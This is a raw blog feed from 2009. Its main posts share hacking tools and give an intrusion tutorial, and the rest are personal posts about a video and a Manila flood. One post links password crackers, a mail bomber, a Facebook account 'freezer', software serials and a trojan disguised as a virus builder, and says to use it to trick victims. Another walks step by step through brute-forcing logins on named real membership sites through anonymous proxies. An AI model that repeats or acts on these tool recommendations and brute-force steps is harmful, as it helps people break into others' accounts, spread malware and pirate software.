href="http://uploading.com/files/S06PAFJJ/john171w.zip.html" target="_blank">http://uploading.com/files/S06PAFJJ/john171w.zip.html</a><br /><br /><br />Rainbowcrack 1.2<br />This tool will helps you to crack the PC users and administartors passwords. This is really good. Tutorial on how to use it is included.<br /><a href="http://uploading.com/files/5R4T4YPI/rain...n.zip.html" target="_blank">http://uploading.com/files/5R4T4YPI/rain...n.zip.html</a><br /><br /><br />Konboot<br />This tool should recover your lost passwords for your PCs users accounts. This is an iso file so you have to burn it on a CD so it works. Work for Windows/Linux<br /><a href="http://uploading.com/files/7VQ5MFN4/pass...o.zip.html" target="_blank">http://uploading.com/files/7VQ5MFN4/pass...o.zip.html</a><br />For more information<br /><br /><br />Firefox Master Password Remover<br />This tool will remove the Master password on firefox. I create it and test it on my PC and works fine. I got this idea since i saw many people begging for master password on their firefox browser. Very effective<br /><a href="http://uploading.com/files/7KII7524/Fire...r.rar.html" target="_blank">http://uploading.com/files/7KII7524/Fire...r.rar.html</a><br /><br /><br />Rapidshare Points Generator v2.4<br />This tool should generate points for your rapidshare accounts. Clean but not test it. Try it and let us know if it works<br /><a href="http://uploading.com/files/K2IC5Z4G/Rapi...4.rar.html" target="_blank">http://uploading.com/files/K2IC5Z4G/Rapi...4.rar.html</a><br /><br /><br />Icon changer<br />I noticed that some people asking for ful version icon changer. I couldn't bring the full version but i bring this. A very simple tool to add/remove icons for any application. It is shareware.<br /><a href="http://uploading.com/files/TG37XPXE/Icon...r.rar.html" target="_blank">http://uploading.com/files/TG37XPXE/Icon...r.rar.html</a><br /><br /><br />Icons Extract<br /><span>The Icons Extract utility scans the files and folders on your computer, and extract the <span style="text-decoration: underline; color: rgb(0, 153, 0); font-weight: 400; font-style: normal;font-family:Verdana,Arial,sans-serif;font-size:11px;" class="IL_LINK_STYLE" >icons and cursors</span> stored in EXE, DLL, OCX, CPL, and in other file types. You can save the extracted icons to ICO files (or CUR files for cursors), or copy the image of a single icon into the clipboard. Very useful</span><br /><a href="http://uploading.com/files/XDHT9FPG/icon...r.zip.html" target="_blank">http://uploading.com/files/XDHT9FPG/icon...r.zip.html</a><br /><br /><br />XSS_Scanner_1.0<br />This tool have been posted twice before but looks it is lost in the forum so i took the initiative to post it in my list. This tool will scan the web using google and will search for vulnerable XSS website.<br /><a href="http://uploading.com/files/HU7BBAYR/XSS_...0.zip.html" target="_blank">http://uploading.com/files/HU7BBAYR/XSS_...0.zip.html</a><br /><br /><br />k9 web protection<br /><span>This tool will let you control your browsers by control what types of websites to block or what particulary websites to block. It is very effective for <span style="text-decoration: underline; color: rgb(0, 153, 0); font-weight: 400; font-style: normal;font-family:Verdana,Arial,sans-serif;font-size:11px;" class="IL_LINK_STYLE" >parental control</span> to limit what there children can access including hacking . Also ability to protect from infected websites. A full list of websites already exist. Very effective</span><br /><a href="http://uploading.com/files/7RVR98TU/k9%2...n.rar.html" target="_blank">http://uploading.com/files/7RVR98TU/k9%2...n.rar.html</a><br /><br /><br />72389 Mass Bomber<br /><span>This tool will let you to send messages to multiple emails from a signle email at the same time. very effective. All <span style="text-decoration: underline; color: rgb(0, 153, 0); font-weight: 400; font-style: normal;font-family:Verdana,Arial,sans-serif;font-size:11px;" class="IL_LINK_STYLE" >credit</span> go to Nathan72389</span><br /><a href="http://uploading.com/files/PS93X57M/7238...r.rar.html" target="_blank">http://uploading.com/files/PS93X57M/7238...r.rar.html</a><br /><br /><br />Nsis 2.45<br />This contain some really good scripts that can be used in your websites and ability to create the script you want. Very good for java writers<br /><a href="http://uploading.com/files/F0CY0R6K/nsis...g.rar.html" target="_blank">http://uploading.com/files/F0CY0R6K/nsis...g.rar.html</a><br /><br /><br />Password door<br /><span>This tool will helps you to restrict access to applications installed on your PC. This tool will put a password that you choose <span style="text-decoration: underline; color: rgb(0, 153, 0); font-weight: 400; font-style: normal;font-family:Verdana,Arial,sans-serif;font-size:11px;" class="IL_LINK_STYLE" >on the application</span> that you choose so no one can open it without a password. Very effective</span><!--INFOLINKS_STOP--><br /><a href="http://uploading.com/files/SL389H3D/Pass...r.rar.html" target="_blank">http://uploading.com/files/SL389H3D/Pass...r.rar.html</a><br /><br /><br />Security administrator<br />This tool will give control on all tasks that all user account have. Block what you don't want them to have as tasks and options eg: block downloading<br /><a href="http://uploading.com/files/Z497IJSP/Secu...r.zip.html" target="_blank">http://uploading.com/files/Z497IJSP/Secu...r.zip.html</a><br /><br /><br />L337 Virus Creator<br />This tool is a fake virus generator. It looks like a virus generator while in fact it will infect the person himself. Use it to trick your victims. Let them think they can create virus using this one while they will get infected once they press any button. NEVER EVER test it on yourself. It will infect you. All credits go to Right Hand Man.<br />Code:<br /><a href="http://i275.photobucket.com/albums/jj299/silverfish4/Untitled-1-18.jpg" target="_blank">http://i275.photobucket.com/albums/jj299/s...titled-1-18.jpg</a><br /><a href="http://uploading.com/files/7KO7NNNW/L337...r.rar.html" target="_blank">http://uploading.com/files/7KO7NNNW/L337...r.rar.html</a><br /><br /><br /><br /><br />Password generator 2.02<br />This tool will create complex passwords that you choose the type of the password and ability to personalize the person.<br /><a href="http://uploading.com/files/SQ1FGMAQ/PWGen-2.02.rar.html" target="_blank">http://uploading.com/files/SQ1FGMAQ/PWGen-2.02.rar.html</a><br /><br /><br />Dork list<br />This is a list for some of the most used dorks in hacking websites.<br /><a href="http://uploading.com/files/7LVF2XEF/Dork...t.rar.html" target="_blank">http://uploading.com/files/7LVF2XEF/Dork...t.rar.html</a><br /><br /><br />Avast Virus removal pro v4<br />This is one of the best virus removal if not the best. It will search for virus on your system and remove them. Very effective<br /><a href="http://uploading.com/files/XPZGHUNA/Avas...4.rar.html" target="_blank">http://uploading.com/files/XPZGHUNA/Avas...4.rar.html</a><br /><br /><br />Password Zilla<br />This is the best password generator i have ever saw in my life. It will create the most complex and complicated passwords in the world. Choose the format of your password and what caracters to use and let it work. Also this tool can crack hashes. I am in love with this tool. My msn was hacked twice but a third time when i used a password generated by this one. Very effective<br /><a href="http://uploading.com/files/PKLLKB3V/Pass...a.rar.html" target="_blank">http://uploading.com/files/PKLLKB3V/Pass...a.rar.html</a><br /><br /><br />WinRar Password Remover v1.1<br />This tool will crack any protected winrar files.<br /><a href="http://uploading.com/files/PEXJGFBY/WinR...1.rar.html" target="_blank">http://uploading.com/files/PEXJGFBY/WinR...1.rar.html</a><br /><br /><br />GroundZero's Account Freezer V1.0<br />This tool will freeze facebook accounts.All credits go to GroundZero<br /><a href="http://uploading.com/files/TGKRE72N/Grou...0.zip.html" target="_blank">http://uploading.com/files/TGKRE72N/Grou...0.zip.html</a><br />Tutorial<br /><br /><br />LC4<br />One of the most proffesional windows password crackers. very useful<br /><a href="http://uploading.com/files/H1M3LOB3/LC4.rar.html" target="_blank">http://uploading.com/files/H1M3LOB3/LC4.rar.html</a><br /><br /><br />1 million serials<br />This have been posted before and i think it is damn good that it shouldn't be lost with the other files. It will provide you with serials for over 1 million software.<br /><a href="http://uploading.com/files/CFO0UES9/1.Mi...s.rar.html" target="_blank">http://uploading.com/files/CFO0UES9/1.Mi...s.rar.html</a><br /><br /><br />Forum auto poster<br />This was posted before in the forum but his owner was quicked out the forum.This tool will helps you to auto post in multiple forums in very few and easy steps.<br /><a href="http://uploading.com/files/J4U3KXUC/foru...r.rar.html" target="_blank">http://uploading.com/files/J4U3KXUC/foru...r.rar.html</a><br /><br /><br />Autorun pro entreprise<br />This is the best autorun maker i have ever saw. It is damn pro. It can be very useful making your virus to autorun.<br /><a href="http://uploading.com/files/E24WUTUH/Auto...e.rar.html" target="_blank">http://uploading.com/files/E24WUTUH/Auto...e.rar.html</a><br /><br /><br />File renamer<br />This tool will remane a very big number of files and folders at the same in only few clicks. Pro hackers can use this one to mess victims system.<br /><a href="http://uploading.com/files/S795U2M2/File...r.rar.html" target="_blank">http://uploading.com/files/S795U2M2/File...r.rar.html</a><br /><br /><br />Cheat Engine 55<br />This tool will helps to hack different things including flash games.<br /><a href="http://uploading.com/files/ZMJOZEIC/Chea...5.exe.html" target="_blank">http://uploading.com/files/ZMJOZEIC/Chea...5.exe.html</a><br />Tutorial<br /><br /><br />Alpha editor<br />Alpha Editor is a Windows based text editor designed to make the creation and use of batch files by administrators easier. Alpha editor includes built in coding for login script creation.<br /><a href="http://uploading.com/files/C52TN3VM/Alph...r.zip.html" target="_blank">http://uploading.com/files/C52TN3VM/Alph...r.zip.html</a><br /><br /><br />CSS Maker<br />Create stylesheets with no CSS knowledge! Don´t worry about the german intro, language can be adjusted in the program...;) very useful for websites writers<br /><a href="http://uploading.com/files/2R3S5TW0/CSS%...r.zip.html" target="_blank">http://uploading.com/files/2R3S5TW0/CSS%...r.zip.html</a><br /><br /><br />Scour 2.3.7<br />I know that many people use scour.com to gain money and that they are getting tireds doing the searches by themself.This tool was posted before in the forum. Use theis tool to automate the searches on scour.com. Jsut input your informations in "Settings.ini" file and you are ready to use it and to win money.<br /><a href="http://uploading.com/files/W1WEC4NL/Scou...7.rar.html" target="_blank">http://uploading.com/files/W1WEC4NL/Scou...7.rar.html</a></span>pinoyhttp://www.blogger.com/profile/06210064855427034777noreply@blogger.com0tag:blogger.com,1999:blog-3481169222727896325.post-8066660970761869192009-09-30T21:02:00.001-07:002009-10-01T17:24:15.286-07:00Video SHARE (Dedication for somebody)<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1KgjP6n3df7JiCojE-synxEzF-XZdpaTRjATVOmTidgmxWKX7_BbmrnXHNKI6dH92Zt1_glxv4YvFmTy0PpgCJD9UeudUNNLbybFCXx_1lDSYgOtOpz1LiJx4HyFGCcvk40rj0fxT/s1600-h/aaa.bmp"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 192px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1KgjP6n3df7JiCojE-synxEzF-XZdpaTRjATVOmTidgmxWKX7_BbmrnXHNKI6dH92Zt1_glxv4YvFmTy0PpgCJD9UeudUNNLbybFCXx_1lDSYgOtOpz1LiJx4HyFGCcvk40rj0fxT/s320/aaa.bmp" alt="" id="BLOGGER_PHOTO_ID_5387791344577263282" border="0" /></a>this video is dedicated to somebody..<br /><br />it's not yet that good and hopefully i could make other stuff like this in the near future..<br /><br />well,, just wanna share..hehehe..<br /><br />i don't care if you don't care..<br /><br />who cares??<br /><br />hahaha..<br /><br /><br /><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/uF2cSX-ZhDc&hl=en&fs=1&"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/uF2cSX-ZhDc&hl=en&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object>pinoyhttp://www.blogger.com/profile/06210064855427034777noreply@blogger.com0tag:blogger.com,1999:blog-3481169222727896325.post-60441477372624696492009-09-30T20:41:00.000-07:002009-10-03T18:24:17.859-07:00How to use AccessDiver - find logins on many sites-WORKS!<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://i31.tinypic.com/syqm8o.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 462px; height: 273px;" src="http://i31.tinypic.com/syqm8o.jpg" alt="" border="0" /></a><br /><span style="color: rgb(0, 0, 0);"><span><span><span>This <span style="text-decoration: underline; color: rgb(0, 153, 0); font-weight: 400; font-style: normal;font-family:Verdana,Arial,sans-serif;font-size:11px;" class="IL_LINK_STYLE" >program</span> checks for vulnerabilities on a </span><span style="text-decoration: underline; color: rgb(0, 153, 0); font-weight: 400; font-style: normal;font-family:Verdana,Arial,sans-serif;font-size:11px;" class="IL_LINK_STYLE" >site</span>, and b</span></span></span><span style="color: rgb(0, 0, 0);"><span><span>ruteforces it. This has a great probability of working, and if it doesn't you can load your own </span><span style="text-decoration: underline; color: rgb(0, 153, 0); font-weight: 400; font-style: normal;font-family:Verdana,Arial,sans-serif;font-size:11px;" class="IL_LINK_STYLE" >wordlist</span> for bruteforcing</span><br />So first download AccessDiver from:<!--c1--><div class="codetop">CODE</div><div class="codemain"><!--ec1-->http://www.accessdiver.com/downloads.htm<!--c2--></div><!--ec2--></span><br /><span style="color: rgb(0, 0, 0);"><span>After you install, open it and go the the My Skill tab on the top and choose <span style="text-decoration: underline; color: rgb(0, 153, 0); font-weight: 400; font-style: normal;font-family:Verdana,Arial,sans-serif;font-size:11px;" class="IL_LINK_STYLE" >the expert</span> level:</span></span><br /><span style="color: rgb(0, 0, 0);"><span><br /></span></span><span style="color: rgb(0, 0, 0);"><span><span>Now go to the Settings Tab and put these settings in. If u see the big logo in <span style="text-decoration: underline; color: rgb(0, 153, 0); font-weight: 400; font-style: normal;font-family:Verdana,Arial,sans-serif;font-size:11px;" class="IL_LINK_STYLE" >the center</span>, </span><span style="text-decoration: underline; color: rgb(0, 153, 0); font-weight: 400; font-style: normal;font-family:Verdana,Arial,sans-serif;font-size:11px;" class="IL_LINK_STYLE" >double click</span> it to </span></span><span style="color: rgb(0, 0, 0);"><span>disable it)</span><br />And remember to make the speed of your bot 40<br /></span><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://i27.tinypic.com/2mh2qu.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 791px; height: 526px;" src="http://i27.tinypic.com/2mh2qu.jpg" alt="" border="0" /></a><br /><span style="color: rgb(0, 0, 0);"><span>Now save these links to a <span style="text-decoration: underline; color: rgb(0, 153, 0); font-weight: 400; font-style: normal;font-family:Verdana,Arial,sans-serif;font-size:11px;" class="IL_LINK_STYLE" >text file</span>:</span><br /><br />[hide_me]<!--c1--><div class="codetop">CODE</div><div class="codemain"><!--ec1-->http://www.proxy4free.com/page7.html<br />http://www.proxy4free.com/page8.html<br />http://www.proxy4free.com/page5.html<br />http://www.proxy4free.com/page6.html<br />http://www.proxymania.com/page2.html<br />http://www.proxymania.com/page3.html<br />http://www.proxy4free.com/page9.html<br />http://www.proxymania.com/page1.html<br />http://www.proxy4free.com/page1.html<br />http://www.proxy4free.com/page3.html<br />http://www.proxy4free.com/page4.html<br />http://www.proxy4free.com/page10.html<br />http://www.proxy4free.com/page2.html<br />http://www.proxymatrix.com/page2.html<br />http://www.proxymatrix.com/page1.html<br />http://www.proxymatrix.com/page3.html<br />http://www.proxymatrix.com/page5.html<br />http://www.proxymatrix.com/page4.html<br />http://www.freepublicproxies.com/page5.html<br />http://www.freepublicproxies.com/page3.html<br />http://www.freepublicproxies.com/page4.html<!--c2--></div><!--ec2-->[/hide_me]<br /><br />And then click on Proxy Web Leecher (in the tools menu)<br /><br /><br /></span><span style="color: rgb(0, 0, 0);"><br /></span><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://i30.tinypic.com/htyxq1.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 500px; height: 284px;" src="http://i30.tinypic.com/htyxq1.jpg" alt="" border="0" /></a><br /><span style="color: rgb(0, 0, 0);"><span>When you see the light blue screen, click on the yellow folder button on the left (Add URL <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">site</span> to the list from a file)</span><br /><span>Then choose the <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">text file</span> that you just saved. And then click start leeching on the bottom. Results are displayed below, and click on the proxy analyzer:<br /><br /><br /></span></span><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://i31.tinypic.com/33cow7c.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 474px; height: 371px;" src="http://i31.tinypic.com/33cow7c.jpg" alt="" border="0" /></a><br /><span style="color: rgb(0, 0, 0);">Right click on of the proxies on the list, then choose Select All. Now all of the proxies should be highlighted. Then click on the Speed/Accuracy Test button:<br /><br /><br /></span><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://i31.tinypic.com/a17c60.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 772px; height: 364px;" src="http://i31.tinypic.com/a17c60.jpg" alt="" border="0" /></a><span style="color: rgb(0, 0, 0);">When finished, select them all again(if not already highlighted), and right click. From the options menu, select all of these things:<br />-Delete bad results and timeouts<br />-Delete not-operational and non-anonymous<br />-Delete fake and idle proxies<br />-Remove getaway proxies<br />-Remove dangerous proxies<br />-Detect and delete black listed proxies(not shown in the screen shot)<br /><br /><br /></span><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://i27.tinypic.com/b6oxkz.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 362px; height: 254px;" src="http://i27.tinypic.com/b6oxkz.jpg" alt="" border="0" /></a><span style="color: rgb(0, 0, 0);">Now make sure all the proxies are are highlighted, and right click them and choose Add selected proxies in your proxy list. If you get an error, click ok, then you will see a new page. Check the Use Web Proxies box. Then go back to the Proxy Analyzer tab(My List), highlight them all, and click Add selected proxies in your proxy list. Now you should see this:<br /><br /><span>Now I think you can put any <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">site</span> in the top address bar, but only websites that require a login. For example, you can try </span><a href="http://members.bangbros.com/" target="_blank">http://members.bangbros.com/</a> and <a href="http://members.teensforcash.com/" target="_blank">http://members.teensforcash.com/</a><span><span><span>. Press Test Basic Authentication and wait for it to finish. You can find logins in the Progression Tab. Again, this might not work on all sites. I think this <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">program</span> just checks for exploits on the </span><span class="IL_SPAN"><input name="IL_MARKER" type="hidden">site</span>, then bruteforces the <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">site</span><span>, and it will give you the usernames and passwords that were found. NOTE: This <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">program</span> uses a </span></span><span class="IL_SPAN"><input name="IL_MARKER" type="hidden">wordlist</span> to bruteforce, so if you have your own <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">wordlist</span> (like that 78MB one that Ra!den provided!) you can load it by clicking the <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">Wordlist</span> menu on top, Load> a single list of PASSWORDS.</span><br /><span>And lol Ra!den, your <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">wordlist</span> was amazing!</span><br /><br /><span>When you paste the URL, press Test Basic Authentication on the left and wait for the <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">program</span> to finish - this might take about 20 minutes for a large website. You can see the % of progress on the task bar. At the end, you will find any logins that work.<br /><br />--credit to hackers lounge<br /></span></span>pinoyhttp://www.blogger.com/profile/06210064855427034777noreply@blogger.com0tag:blogger.com,1999:blog-3481169222727896325.post-86964477803799529762009-09-28T00:03:00.000-07:002009-09-30T00:21:26.912-07:00Life Changing Experience (water World)<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYgSOeWXRcm6pABQOuSD5SWin0E6S6tJysgJuj9htAvqHnhC-oq-KjgrXfWUnQBCGKXB0vcfryUHG21jqwlPDtrQoRK2mgK0PAWsy-kL0WXLM_OhYGyQ-BS8JMuOxxehK_3ptUBerA/s1600-h/DSC00839.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px; height: 240px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYgSOeWXRcm6pABQOuSD5SWin0E6S6tJysgJuj9htAvqHnhC-oq-KjgrXfWUnQBCGKXB0vcfryUHG21jqwlPDtrQoRK2mgK0PAWsy-kL0WXLM_OhYGyQ-BS8JMuOxxehK_3ptUBerA/s320/DSC00839.JPG" alt="" id="BLOGGER_PHOTO_ID_5386736115453265170" border="0" /></a>A work of art?<br />A way of God?<br />A Challenge to everyone?<br />Or just a show of the consequence of MAN's misdeeds..<br /><br />they say nature has its ways..<br />The greatest masterpiece of nature..<br /><span style="font-weight: bold; color: rgb(255, 0, 0);font-size:130%;" >to destroy in order to rebuild</span>..<br />to eliminate the few to make the others realize..<br /><br />the message of nature..<br />"<span style="font-weight: bold; color: rgb(255, 0, 0);font-size:130%;" >DO UNTO ME and I WILL RETURN IT TO YOU</span>"..<br />This week, many of our country men faced the revenge of nature.. the effect of climate change caused by men's works..Particularly in Manila, many died, Private and Personal properties destroyed, stranded, hunger struck the many, and many lost their love ones..<br /><br />Life changing it is because of this, the rich experienced to be poor, and the poor just experienced the most exciting part of their lives, to make the rich feel what they feel..pinoyhttp://www.blogger.com/profile/06210064855427034777noreply@blogger.com0